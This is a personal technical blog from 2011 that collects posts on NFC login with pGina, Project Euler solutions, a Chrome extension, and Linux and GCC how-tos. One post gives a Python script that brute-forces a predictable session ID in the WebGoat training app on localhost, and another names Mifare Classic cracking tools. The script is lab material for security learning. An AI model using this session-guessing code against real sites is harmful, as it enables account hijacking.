Pages

Wednesday, December 21, 2011

NFC authentication to Windows XP

1. pGina
- pGina is an open source authentication system, that can be used as a replacement for existing GINA in Windows
- it's architecture is based on plugins
- already supported types of user authentication: RSA SecureID, Kerberos, LDAP, PAM, SSH, and others..
- dummy skeleton plugin can be extended/modified to support authentication with nfc touchatag mifare tags (or any other suported by libnfc)


2. Libnfc
- libnfc (from version 1.5.1)  has a demo reader/writer for Mifare Ultralight cards.  This can be modified and used as an external program, launched by the plugin dll to perform nfc tag reading. Based on the ID read (or maybe other info) authentication can be performed.


3. Steps to use/enhance/customize the plugin
- study dummyPlugin
- useful resources on pGina mailing lists
- the binary for Mifare Ultralight tags reader can be modified and then integrated and built with libnfc cmake system. 
- another reader can be used (also from nfc library), for example one for the well-known  Mifare classic tag.
(!!! Security broken, but this is another story: 
http://en.wikipedia.org/wiki/MIFARE#Security_of_MIFARE_Classic
MFCUK: MiFare Classic Universal toolKit, 
crapto1: attacks against crypto1 proprietary cipher and
MFOC:  Mifare Classic Offline Cracker)


Resources:

  • A platform independent Near Field Communication library: libnfc
  • Open source replacement for authentication in MS Windows: pGina
  • Cheap NFC reader + demo cards (MIFARE Ultralight tags) : Touchatag
  • PoC plugin for pGina 1.x (Windows XP) to suport login with nfc tag: code.

Thursday, November 24, 2011

PoC fuzzer for weak session ID (WebGoat Hijack Session level)

The "Hijack Session" level from Session Management Flaws category guides you through cracking (through brute-force) a weak session id number, predictable, based on 2 parts:
- a sequential number
- time (in milliseconds) 


The first part of the solution implies using WebScarab's session analysis features. After finding out the missing number, and the time range for the missing number, the session cookie can be easily cracked. A Java tool for doing this is J-Baah. 
A simple python script to do just that, brute force the time variable, could be:
'''
Fuzzer for weak session ID (WebGoat Hijack Session level)

'''

import httplib

if __name__=="__main__":
 httpServ = httplib.HTTPConnection("127.0.0.1", 80)
 
 httpServ.connect()

 for wid in range (473, 582):
  weakid = "10991-1322155944%s" % wid
 
  headers = {"Host": "localhost",
     "Proxy-Connection": "keep-alive",
     "Content-length": "69",
     "Cache-Control": "max-age=0",
     "Origin": "http://localhost",
     "User-Agent": "Fuzzy",
     "Content-Type": "application/x-www-form-urlencoded",
     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Referer": "http://localhost/WebGoat/attack?Screen=192&menu=1700",
     "Accept-Encoding": "gzip,deflate,sdch",
     "Accept-Language": "en-US,en;q=0.8",
     "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
     "Cookie": "JSESSIONID=E7F6B85DD9423511BF95E45B70332DAB; WEAKID=%s" % weakid,
     "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}
  httpServ.request('POST', 
      '/WebGoat/attack?Screen=192&menu=1700', 
      'Username=Jack&Password=sniffy&WEAKID=%s&SUBMIT=Login'% weakid,
      headers)

  response = httpServ.getresponse()
  print "weakid: ", weakid
  print response.read()
 
  httpServ.close()
 


(Modifications needed for adjusting the missing sequential number (found through WebScarab session analysis), and the time range. )

Monday, October 24, 2011

Hide right side ads in Gmail


A simple chrome extension to hide the ads showed in the right side of emails. The ads will still be there (someone will still search through emails to generate suitable ads), but will be hidden using CSS.
Nice tutorials on building extension for chrome at [5] and [4].
The source code and packed .crx extension are uploaded to google code.
Compilations of references (thanks):

  1.   Getting started
  2.   Content scripts
  3.   Extensions FAQ
  4.   Extensions dev guide
  5.   Creating a chrome extension tutorial
  6.   IconFinder 

Sunday, October 16, 2011

XML Formatter

Many times I've searched for tools/plugins/libraries to format/indent/... small XML files. A tool to do that can be easily done with classes from System.Xml namespace
try{      
 // Format XML file
 XmlDocument^ doc = gcnew XmlDocument;
 
 char tmpFileName[MAX_PATH] = "";
 GetTempFileName(".", "bak_1", 0, tmpFileName);
 
 // convert unmanaged -> managed
 String^ srcFile = gcnew String(szFileName);
 String^ tmpFile = gcnew String(tmpFileName); 
 
 File::Copy(srcFile, tmpFile, true);
 try{
  doc->Load(tmpFile);
 }
 catch(XmlException^ e1) {
  //convert Managed -> unmanaged
  TCHAR* errMsg = (TCHAR*)(void*)Marshal::StringToHGlobalAnsi(e1->Message);
  MessageBox(NULL, errMsg, "Error", 0);
  return 0;
 }

 XmlWriterSettings^ xws = gcnew XmlWriterSettings;     
 xws->Indent = true;
 xws->CheckCharacters = false;

 XmlWriter^ writer = XmlWriter::Create(srcFile, xws);      
 doc->Save(writer);
 writer->Close();

 File::Delete(tmpFile);
}
catch(Exception ^e) {
 MessageBox(NULL, szFileName, "Exception while converting following files:", 0);
}
MessageBox(NULL, "Converted", "ok", 0);


How nice would be to build your own small tools and adapt them when you need to.   A (very) small step towards being a self sustainable programmer is this :)
http://code.google.com/p/cool-xml/

Wednesday, October 12, 2011

Easy reviewing with Anki

Anki is a program that makes remembering things easier.
Here's  ~300 questions,  put in anki flash cards, extracted from great ceh exam prep guide.
...would have been very useful in reviewing the material.

Wednesday, June 8, 2011

Number of paths in square grid (Project Euler problem 15)

Description of the problem (from here ):
Starting in the top left corner of a 2×2 grid, there are 6 routes (without backtracking) to the bottom right corner.
How many routes are there through a 20×20 grid?


A: We can observe that:
  •  every path has exactly 2*n moves, every move being either right or down (backtracking isn't allowed)
  • in every 2*n path there are n moves down and n moves right. 
So, the number of all the distinct possibilities is the number of ways we can arrange n right moves from 2*n positions:

Tuesday, June 7, 2011

Number of digits in Fibonacci term (Project Euler problem 25)

Q: The question from the problem 25  is to find the first term in the Fibonacci sequence to contain 1000 digits. 


A: The answer comes from wiki


Since Fn is asymptotic to \varphi^n/\sqrt5, the number of digits in F_n\, is asymptotic to n\,\log_{10}\varphi\approx0.2090\,n. As a consequence, for every integer d > 1 there are either 4 or 5 Fibonacci numbers with d decimal digits.


So, 1000/0.2090 is approximately  4784, and the first Fibonacci term with 1000 digits is the 4782th term.

Monday, June 6, 2011

Maximal sum in a triangle (Project Euler problem 67)

The problem description is here. For a given triangle you have to find the path with the maximum path. Given an input triangle :
3
7 4
2 4 6
9 5 9 3



We can compute the maximum sum path using 2 approaches:

Solution 1 : bottom-up. Build maximum path from bottom.  From the next-to-last row, up to the first, add the maximum corresponding sub-triangle. So the initial triangle becomes iteratively:


3
7    4
11 13 15
9    5    9  3


3
20 19
11 13 15
9    5    9  3


23
20 19
11 13 15
9    5    9  3

So the maximum sum is 23, and the maximum path 
3
7 4
4 6
9 5 9 3

Solution 2: same result is obtained with a top-down approach. Starting from the second row, compute the maximum-sum path to every element. So the initial triangle becomes iteratively:
3
10  7
2 4 6
9 5 9 3

3
10  7
12 14 13
9 5 9 3

3
10  7
12 14 13
21 19 23 16

We get same result for the maximum sum.

Simple python Implementation for the bottom-up solution:
def get_numbers():
    #lines = open("tri_small.txt", "r")    
    lines = open("tri.txt", "r")    
    
    listOfRows = []
    
    for line in lines:
        currRow = [int(x) for x in line.split()]
        listOfRows.append(currRow)
    
    return listOfRows
    
def solve():
    row_list = get_numbers()
    length = len(row_list)
    
    for i in xrange(length-2, -1, -1) :
        len_row = len(row_list[i])                   
        for j in range(0, len_row) :
            row_list[i][j] += max(row_list[i+1][j], row_list[i+1][j+1])
        
    print row_list[0]
    return 0

Saturday, April 30, 2011

How to create an offline Ubuntu repository

Debmirror program  creates a local mirror of a Deban repository. A quick way to build an offline repository, save it to to an USB drive, and use it on a computer without internet access:

  1. Install the application on a computer with internet:
    $ sudo apt-get install debmirror
    
  2. Get the key for the repository and add it to the keyring. This can be done be importing it from a debian keyring:
    $ gpg --no-default-keyring --keyring /home/USER/.gnupg/trustedkeys.gpg --import /usr/share/keyrings/ubuntu-archive-keyring.gpg
    
  3. Download the repository (approximate sizes for different repositories can be found in the man page):
    $ sudo debmirror -a i386 --no-source -s main -h ro.archive.ubuntu.com -d natty,natty-updates,natty-security -r /ubuntu --progress -e http mirror
    
    This mirrors section main of Ubuntu 11.04 Natty, updates and security  All options are explained in the man page.
  4. Mount usb device containing the repository to the other computer:
    $ mount /dev/sdb1 /mnt/usb
    
  5. Create a backup copy of sources.list file and modify it:
    $ sudo cp /etc/apt/sources.list /etc/apt/sources.list.backup
    $ sudo vim /etc/apt/sources.list
    
    Delete all content and add just:
    deb file:///mnt/usb/mirror natty main
    deb file:///mnt/usb/mirror natty-updates main
    deb file:///mnt/usb/mirror natty-security main
    
  6. Retrieve the new list of packages from the offline repository:
    $ sudo apt-get update
    
  7. Upgrade the repository:
    $ sudo apt-get upgrade
    
  8. Start installing packages....

Monday, April 18, 2011

Use OpenSSL to sign a document

OpenSSL is an open source cryptography  library with lots of useful functions. First part, how to sign a document using DSA signature scheme. 

  1. Use dsaparam to generate DSA parameters(p, q, g), used to generate keys (possibly several keys):
    openssl dsaparam 1024 > dsaparam.pem
  2. Generate key file (contains private and public key):
    openssl gendsa dsaparam.pem -out dsa_key.pem 
    Or, if the parameters p,q,g weren't precomputed (step 1):
    openssl dsaparam -noout -out dsa_key.pem -genkey 1024
  3. Extract public key
    openssl.exe dsa -in dsa_key.pem -pubout -out dsa_pub_key.pem
  4. Generate sha1 hash of a file.
    openssl dgst -sha1 foo.txt | awk '{print $2}' > foo.txt.sha1
  5. Sign the hash
    openssl dgst -dss1 -sign dsa_key.pem text.txt.sha1 >foo.txt.sig
  6. Verify the signature (using public key)
    openssl dgst -dss1 -verify dsa_pub_key.pem -signature foo.txt.sig foo.txt.sha1


Links:
  1.  DSA key processing man page
  2. OpenSSL command-line Howto

Wednesday, February 9, 2011

Creating shared libraries

  • Intro
    Shared libraries are libraries that are loaded by programs when they start. To function properly, some conventions must be followed, related to library names and location:
    1. A shared library has a special name called the ``soname'', with the prefix ``lib'', the name of the library, the phrase ``.so'', followed by a period and a version number that is incremented whenever the interface changes (libmyfunctions.so.1)
    2. A fully-qualified soname is simply a symbolic link to the shared library's ``real name''. (libmyfunctions.so.1 -> libmyfunctions.so.1.0.1)
    3. A shared library also has a ``real name'', which is the filename containing the actual library code. The real name adds to the soname a period, a minor number, another period, and the release number. The last period and release number are optional. The minor number and release number support configuration control by letting you know exactly what version(s) of the library are installed. ( libmyfunctions.so.1.0.1 )
  • Creating and testing
    Files used are the same as in the static library example (add.c, mult.c, foo.c, myfunctions.h).
    $ gcc -fPIC -g -c -Wall add.c mult.c
    $ gcc -shared -Wl,-soname,libmyfunctions.so.1 -o libmyfunctions.so.1.0.1 add.o mult.o -lc
    $ ln -sf libmyfunctions.so.1.0.1 libmyfunctions.so
    $ ln -sf libmyfunctions.so.1.0.1 libmyfunctions.so.1
    $ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
    $ gcc -Wall -L. foo.c -lmyfunctions -o foo
    
    More about library placement on filesystem and  LD_LIBRARY_PATH environment variable here.
  • Dynamic loading and un-loading of shared libraries
    Libraries can be loaded and unloaded during the execution of the program, creating a plugin architecture. It's important to understand the linkage and when/how to use extern "C" {...}. The C++ compiler mangles the name of C++ functions, but also the C variable names (info here). To list symbols names use nm utility (nm libmyfunctios.so). The source of the main program, that will be compiled with g++:
    foo.cpp:
    #include <stdio.h>
    #include <stdlib.h>
    #include <dlfcn.h>
    
    int main(int argc, char **argv) 
    {
       void *lib_handle;
       int (*fn)(int, int);
       
       char *error = NULL;
    
     int sum = 0;
    
       /* Load library */
       lib_handle = dlopen("libmyfunctions.so", RTLD_LAZY);
       if (!lib_handle) 
       {
          fprintf(stderr, "dlopen error: %s\n", dlerror());
          exit(1);
       }
    
       /* Load symbol */ 
       *(void **) (&fn) = dlsym(lib_handle, "add");
       /* see dlsym man page for this casting reason */
       if ((error = dlerror()) != NULL)  
       {
          fprintf(stderr, "dlsym error: %s\n", error);
          exit(1);
       }
    
       sum = (*fn)(0x11,0x22);
       printf("Sum: %d\n", sum);
    
       dlclose(lib_handle);
    
       return 0;
    }
    
    To compile and check it:
    $ g++ -rdynamic foo.cpp -ldl
    $ ./a.out
    
    More information on dlsym function and binding parameters used in dlopen(RTLD_LAZY, RTLD_GLOBAL and RTLD_NOW) on the man page.
  • Dynamic library loading on windows
  • Links:  

Monday, January 31, 2011

Create static library with GCC

  1. Info
    Multiple object modules can be packed together into a single file called static library. It can be then passed to the linker. The linker builds the executable and copies the object modules from the library that are referenced by the program.

    The static library was developed to workaround the disadvantages of linking a whole dynamic library (a program would contain the code for the whole library (waste of space) and also when it's loaded into memory, the memory will contain code for all the function in the library(waste of memory)). With a static library, at link time the linker will copy only the object modules that are referenced by the application (This reduces the size of executable on disk and also on memory!)

  2. Creating the library
    • Building the library from 2 initial source files:
      mult.c

      /* no bounds checking*/
      int mult(int a, int b) {
          return a*b;
      }
      
      add.c
      /* no bounds checking*/
      int add(int a, int b) {
          return a+b;
      }
      
      The 2 files are compiled with gcc -Wall -c add.c mult.c

      Library is created with ar rcs libmyfunctions.a add.o mult.o
      More details on parameters for the ar utility with man ar. Also, to list the content of the archive the command ar -t libmyfunctions.a is useful.
  3. Linking
    • One way: gcc -o executable-name prog.c -L/path/to/library-directory -lmyfunctions
    • Or: gcc -o executable-name foo.c libmyfunctions.a
  4. Testing
    foo.c
    #include <stdio.h>
    
    #include "myfunctions.h"
    
    int main() {
        printf("%d", add(1,3));
        
        return 0;
    }
    
    myfunctions.h
    #ifndef  __MYFUNCTIONS_H__
    #define  __MYFUNCTIONS_H__
    
    int add(int a, int b);
    int mult(int a, int b);
    
    #endif  /* MYFUNCTIONS_H */
    
    Compiling and running:
    $ gcc -o foo foo.c -L. -lmyfunctions
    $ ./foo
    

Friday, January 28, 2011

Move/add swap partition in Ubuntu

    To see the amount of existing swap space:
cat /proc/meminfo |grep -i swap
The output should be something like below. Full explanation of /proc/meminfo here.
SwapCached:  2244 kB
SwapTotal:  1052248 kB
SwapFree:  1043908 kB
 If you want to add a new swap partition, or delete the existing one and create another:
sudo swapoff -a
sudo mkswap /dev/sda3
#Edit fstab to add the UUID given by sudo blkid command. Then:
sudo swapon -a
#Check
swapon -s
References:
  1. /proc/meminfo Explained 

Saturday, January 22, 2011

Partition/Disk imaging with CloneZilla

    CloneZilla it's a free and open source software for partition imaging and disk cloning. Some features I liked:

  1. It supports ext4 partitions
  2. It's possible to do all the steps from command line (do imaging/restoring in unattended mode)
  3. The image file can be located on the local disk, on external USB drive, on an ssh server, samba server or NFS server
The complete list of features and limitations on the site.

I used CloneZilla Live, a bootable Linux based on Debian, on an USB stick, using Method A. Till now I restored one Ubuntu ext4 partition and one NTFS with Windows. 


Tips (from faqs):

  • Restore *.ntfs-img.* images into a partition manually:
    If the image is /home/partimag/YOURIMAGE/hda1.ntfs-img.aa, hda1.ntfs-img.ab..., and you want to restore the image to /dev/sda2.
    Before you do it, make sure the partition size of /dev/hda2 is equal to or larger than the original partition size of hda1 image.
    Then
    file /home/partimag/YOURIMAGE/hda1.ntfs-img.aa
    (to see it's gzip, bzip or lzop image). For gzip, then you can run
    cat /home/partimag/YOURIMAGE/hda1.ntfs-img.* | gzip -d -c | ntfsclone --restore-image -o /dev/hda2 -
  • Restore an image of a partition to different partition:
    1. Make sure the destination partition is larger than the original one.
    2. Rename all the files /home/partimag/my-image-new/sda4* as /home/partimag/my-image-new/sda2* (the original was sda4, now it's sda2)
    3. Modify the content of /home/partimage/my-image-new/parts, replace sda4 with sda2.
ToDO:
  • Test the unattended automated mode. 

Reinstall Ubuntu after installing Windows

   Long story here.  Ubuntu is well documented and documentation updated. Ubuntu forums are great also. So I had Ubuntu Maverick already installed, and installed Windows XP. It wrote over the mbr. Now, to restoration:
  • I booted using an USB live image
  • Mounted the ext4 partition containing the Ubuntu 10 installation and restored burg:
    sudo burg-install --root-directory=/media/0d104aff-ec8c-44c8-b811-92b993823444 /dev/sda
    
    (0d104aff-ec8c-44c8-b811-92b993823444 is the label of the mounted Ubuntu root partition. I use burg, so for grub it's the same, except grub-install instead.)
  • To list Windows also in the menu list of grub,
    sudo update-burg 
    
    or is using grub2:
    sudo update-grub2
    
  • I also had to modify /boot/burg/burg.cfg file, because Windows installation was automatically detected on /dev/sda3 (hd0,3), instead of /dev/sda4 ((hd0,4)).
    Note: changes made manually in the burg.cfg file are not persistent after burg-update, because burg-update automatically generates it based on /etc/burg.d files.
Hope I didn't miss any steps. For more detailed information:

Install Windows XP from USB

    After trying many tutorials to install XP from USB, I found something that worked. The WinSetupFromUSB tool.  I've tested with Windows XP 32bit SP2 and SP3 and worked fast and easy. Some prerequisites:

  • USB stick >1GB
  • Windows XP CD/DVD or iso
  • WinSetupFromUSB program
Notes:
  1. First I tried with an XP sp3 iso(XP Performance Edition), modified with nLite,  I got an error (missing winnt32...). A trick I've read, if you make modify your iso with nLite, is to NOT remove "Manual Install and Upgrade” under Operating System Options.
  2. It's better to integrate SP3 if you have just sp1 or sp2.  Details, reason and ste by step instructions  here. (the process is called slipstreaming drivers)
   The usage is straight-forward, click-click.., select the source, format the USB device (I used the HP format tool, already integrated with WinSetupFromUSB ), select USB, click Go. The program takes care of making the device bootable, after copying XP files. 
   Change from BIOS to select USB as first device to boot, and you'll get to a grub4dos where you choose XP setup first part. 

Note: I had a problem at the second part. There are 8 options, one default, with the suggestion to choose one that works. For me it was the 4th.

Next, how to get grub (or burg) back in the mbr, after XP installation, to be able to boot the existent Ubuntu also.

Tuesday, January 18, 2011

Trace function calls with GCC

     With gcc it is possible to trace offline the execution of a program. GNU GCC has a feature that allows to gather a function call tree. When you compile your program with a special instrumentation flag, and link with a trace library that contains 4 specific functions, you can mark every entrance end exit from functions. From GCC manual:
-finstrument-functions
Generate instrumentation calls for entry and exit to functions. Just 
after function entry and just before function exit, the following 
profiling functions will be called with the address of the current 
function and its call site. (On some platforms, __builtin_return_address
 does not work beyond the current function, so the call site information 
may not be available to the profiling functions otherwise.)
          void __cyg_profile_func_enter (void *this_fn,
                                         void *call_site);
          void __cyg_profile_func_exit  (void *this_fn,
                                         void *call_site);
     
The first argument is the address of the start of the current function, 
which may be looked up exactly in the symbol table.
    If a function does not need to be instrumented, it can be excluded, using __attribute__ ((no_instrument_function)) in the function definition. (This helps to tell gcc to not instrument __cyg_* profiling functions.)
Profiling functions for enter and exit:
void __attribute__ ((no_instrument_function))
__cyg_profile_func_enter (void *func, void *caller);
void __attribute__ ((no_instrument_function))
__cyg_profile_func_exit (void *func, void *call_site);

    When an instrumented function is called,__cyg_profile_func_enter is also called, passing in the address of the function called as func and the address from which the function was called as caller. Conversely, when a function exits, the __cyg_profile_func_exit function is called, passing the function's address as func and the actual site from which the function exits as call_site.
    Within these profiling functions, you can record the address pairs for later analysis. To request that gcc instrument all functions, every file must be compiled with the options -finstrument-functions and-g to retain debugging symbols.
    So, now you can provide profiling functions to gcc that it will transparently insert into your application's function entry and exit points. But when the profiling functions are called, what do you do with the addresses that are provided? One option would be to just write the addresses to a file, together with the time function enters and exits.
    There are other 2 functions invoked: constructor when main is called, and destructor when the application exits. To create them, create 2 functions and apply constructor and destructor attributes to them:
void __attribute__ ((constructor))
trace_begin (void);
void __attribute__ ((destructor))
trace_end (void)
    In constructor and destructor you can open the trace files, and in __cyg_profile_func_* register info like function address, caller address, and time. 
To resolve the addresses to actual function names, the Addr2line tool (which is part of the standard GNU Binutils) is an utility that translates an instruction address and an executable image into a filename, function name, and source line number. The usage for this tool is as follows:
$ addr2line.exe -f -e prog 0x004011FF
f
/cygdrive/d/work/prog.c:35
    Here prog is the binary name, and 0x004011FF is the function address. The information returned gives the function name and location.
Here is an example on how to use this feature to link a small problem with the trace library and view a call tree.

Tuesday, January 11, 2011

Ubuntu 10 remove encryption from home directory

     I just installed Ubuntu 10.10 (great choice!). One nice feature that can be enabled at install time is to encrypt your home directory. Full details about this and usage in this wiki.  Anyway, encrypting the whole home folder introduced very small delays and I decided to keep my home unencrypted, but atill have a Private folder there that will be encrypted.  The steps to achieve this (if you already have your whole home encrypted):

  • You should not be logged on the system. One way to do this is to start Ubuntu in recovery-mode, and chose root prompt. That will drop you at # prompt. 
  • Your account should not be mounted (and it isn't if yo used the root prompt). Btw, when logged in, if you use 'T' flag at df ( $df -hT )  you can see the type of your home partition as ecryptfs,  mounted in /home/username.
  • Create a new folder that can be used lated as a new encrypted private folder, within your home (mkdir /home/username/Private
  • chown username.username /home/username/Private
  • Now modify in the file /home/.ecryptfs/username/.ecryptfs/Private.mnt the new encrypted path, (/home/username/Private)
  • Switch from root to username (#su - username)
  • Mount private encrypted files, by running the wrapper script ecryptfs-mount-private.  This will prompt for the username password. Now your private encrypted home folder will be mounted under the new specified path, /home/username/Private
  • Synchronize that with your /home/username: $cd ~/Private; rsync -av ./ /home/username/   
  • Exit ( $exit ) the shell where you're logged in as username and #reboot from root prompt.
  • After restart check that all the files are there, in your /home/username, unencrypted.
  • The content of the ~/Private can be deleted now. This folder can be further used as a storage for encrypted files
To check that files created in ~/Private are really encrypted:
  • create a secret file there
  • verify (with $df -T) the type of the filesystem mounted under /home/username/Private. It should be ecryptfs.
  • if you log in as another user, (or as root at the root prompt from rescue mode) you won't be able to mount it..
Very nice thing to make this feature really easy to use and document it
GG! 

Monday, January 10, 2011

USB Camera in Skype in Ubuntu 10.10

    I've connected a basic USB webcam. It seemed to work correctly, but in Skype it didn't start showing anything. It's detected by lsusb as Microdia:
$ lsusb 
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 002: ID 0c45:612a Microdia PC Camera (SN9C325)
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
To see that the camera it's working correctly (has modules installed), I used cheese (sudo apt-get install cheese  and then Applications->Sound and Video->Cheese Webcam Booth and I see myself:). 
The workaround to work also in Skype is to specify some libraries at start, in the LD_PRELOAD environment variable. If I run Skype with:


sh -c 'export XLIB_SKIP_ARGB_VISUALS=1 && LD_PRELOAD=/usr/lib/libv4l/v4l1compat.so /usr/bin/skype'


I got image, so I modified the command to start the program (Right click on Applications Menu, Edit Menus and edited the command for Skype).


Saturday, January 8, 2011

Install drivers for SIS 771/671 graphic card in Ubuntu 10.10 and 11.04

   My Esprimo Mobile V5535 laptop came with an unsupported by default graphic card SiS 771/671.

$ lspci -nn |grep -i vga
01:00.0 VGA compatible controller [0300]: Silicon Integrated Systems [SiS] 771/671 PCIE VGA Display Adapter [1039:6351] (rev 10)

After infinite searching (that took almost 4 hours:) on forums about that problem,  I finally got some working drivers (still without 3d acceleration that doesn't seem to be supported in the near future) from the 5th post from here (I still have the files if the links are not working).  This contains instructions also:

  • copy the driver (sisimedia_drv.so)  to /usr/lib/xorg/modules/drivers
  • modify (or copy xorg.conf if you don't have that file) /etc/x11/xorg.conf with the lines from xorg.conf contained in the archive.

Warning!!
Check the refresh rate supported by your monitor!  An incorrect setting may damage the monitor.I modified mine like below, in the "Monitor" section of xorg.conf:
    .....

#      HorizSync 30-63
#      VertRefresh 50-75
        HorizSync 28-72
        VertRefresh 43-60
   .....


P.S.:

  • If possible stay away from SiS graphics cards, at least until they decide to support Linux. Stick with Intel, AMD, nVidia.
  • SiS Graphic on Linux site contains lot of other drivers, that have been used  successfully by others in Linux 
  • http://ubuntuforums.org is a great resource   

Enjoy and hope it helps!

EDIT for Ubuntu 11.04 Natty :
Using the instructions on this post worked for me, and I encountered 2 issues:

1. I had a blank screen just after reboot (instead of grub). I solved that (or it solved by itself ?!) by rebooting with an ubuntu live usb and deleting some resolution modes from xorg.conf. (dont know if this actually was the solution but he computer booted correctly.
2. I had to modify in xorg.conf in the Device section Driver "sis", after 'sudo make install'

After that, because this graphic card does not support 3d acceleration, you have to install Unity 2d, (which looks kindof ok compared to the real deal). Complete instructions on installing Unity 2D in Ubuntu 11.04 here.

EDIT2:
Still on that blog, the drivers compiled!